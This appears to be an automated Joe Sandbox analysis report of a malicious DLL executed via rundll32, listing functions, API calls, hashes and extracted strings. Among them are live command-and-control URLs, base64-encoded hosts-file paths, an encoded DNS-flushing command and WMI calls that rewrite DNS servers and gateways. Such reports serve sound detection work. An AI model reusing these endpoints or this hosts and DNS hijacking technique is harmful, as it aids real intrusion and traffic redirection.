                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: $p=Vu
                                                                                                                                                                          • API String ID: 1927566239-153977967
                                                                                                                                                                          • Opcode ID: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction ID: eb1a3d92cece7d0a5f388039fb4e2ce0f3b3243cd5656f56a25f0c556dfa24ec
                                                                                                                                                                          • Opcode Fuzzy Hash: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction Fuzzy Hash: A7418375D0025A9BEF04DFA4C984AEEB7F8FF04284F10456EE90AA3245DB38AE04C761
                                                                                                                                                                          Function 10005C5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$http://
                                                                                                                                                                          • API String ID: 1721638100-679094439
                                                                                                                                                                          • Opcode ID: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction ID: 57a004b8a41de6ea14946d18f863adaefc4c4a039aa1cd5e98ec9af79828a04e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: FF11047690411C7EFB21DAA4CC42FDB7B6CDB04398F0045B1FB44B6081EA71AF844660

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:0.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:28
                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                          execution_graph 29715 10001812 29716 10001817 29715->29716 29719 10001000 29716->29719 29718 10001821 29720 100016c0 29719->29720 29723 10021753 29720->29723 29722 10001804 ctype 29722->29718 29724 10021758 29723->29724 29727 1002f839 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29724->29727 29728 100025d2 29729 100025d7 29728->29729 29730 10001000 5 API calls 29729->29730 29731 100025e1 29730->29731 29734 10028391 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29731->29734 29739 10002523 29740 10002528 29739->29740 29741 10001000 5 API calls 29740->29741 29742 10002532 29741->29742 29745 10024275 29742->29745 29746 10024294 29745->29746 29749 1003b76d 6 API calls 29746->29749 29754 10004468 29755 10004478 29754->29755 29758 100290bf wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29755->29758 29763 100018ee 29764 100018f3 29763->29764 29765 10001000 5 API calls 29764->29765 29766 100018fd 29765->29766

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 10007231 Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 366COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007370
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 1000739A
                                                                                                                                                                            • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007536
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                                                          • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
                                                                                                                                                                          • API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          Function 100053C9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 227sleepfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005449
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000538F
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000539C
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053A5
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053B2
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054B0
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054CE
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(?,?,76078400,?,00000000), ref: 100054F0
                                                                                                                                                                          • rand.MSVCRT ref: 1000553C
                                                                                                                                                                          • rand.MSVCRT ref: 1000554A
                                                                                                                                                                          • rand.MSVCRT ref: 10005555
                                                                                                                                                                          • rand.MSVCRT ref: 10005560
                                                                                                                                                                          • rand.MSVCRT ref: 1000556B
                                                                                                                                                                          • rand.MSVCRT ref: 10005576
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005594
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100055C0
                                                                                                                                                                          Strings
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
                                                                                                                                                                          • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                                                          • API String ID: 3997227624-455112146
                                                                                                                                                                          • Opcode ID: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
                                                                                                                                                                          Function 10006F01 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 174sleeplibraryfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 10006F47
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FAE
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FC5
                                                                                                                                                                          • Sleep.KERNEL32 ref: 1000707C
                                                                                                                                                                          • wsprintfA.USER32 ref: 100070C0
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInitializePrintSleepThunk$wsprintf
                                                                                                                                                                          • String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
                                                                                                                                                                          • API String ID: 983772623-3558339448
                                                                                                                                                                          • Opcode ID: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
                                                                                                                                                                          • Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
                                                                                                                                                                          • Opcode Fuzzy Hash: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
                                                                                                                                                                          • Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51
                                                                                                                                                                          Function 10004D48 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 306COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004ED7
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EDD
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EE3
                                                                                                                                                                          • VariantInit.OLEAUT32(?,?,?,00000000), ref: 10005021
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                                                          • API String ID: 1927566239-3240772352
                                                                                                                                                                          • Opcode ID: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
                                                                                                                                                                          • Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
                                                                                                                                                                          • Opcode Fuzzy Hash: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
                                                                                                                                                                          Function 1000828F Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 144librarysleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • 8.8.8.8, xrefs: 10008412
                                                                                                                                                                          • http://107.163.56.232:18963/main.php, xrefs: 10008376
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
                                                                                                                                                                          • 127.0.0.1, xrefs: 10008417
                                                                                                                                                                          • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk$Sleepwsprintf
                                                                                                                                                                          • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 2795264321-515792873
                                                                                                                                                                          • Opcode ID: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
                                                                                                                                                                          • Instruction ID: 8dd24be72779d1db326892d4824c811f5291eb1f4f1f793922e2c79d5d000f77
                                                                                                                                                                          • Opcode Fuzzy Hash: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
                                                                                                                                                                          • Instruction Fuzzy Hash: A44109B6D0425976FB21D364CC56FCF7B6CEB44280F2045A5F248BA086DAB4AB844F55
                                                                                                                                                                          Function 1000599B Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf
                                                                                                                                                                          • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$F896SD5DAE$M%s
                                                                                                                                                                          • API String ID: 2111968516-1696321353
                                                                                                                                                                          • Opcode ID: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
                                                                                                                                                                          • Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
                                                                                                                                                                          • Opcode Fuzzy Hash: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
                                                                                                                                                                          Function 100064AB Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 271timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                            • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
                                                                                                                                                                            • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
                                                                                                                                                                          • wsprintfA.USER32 ref: 100066FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
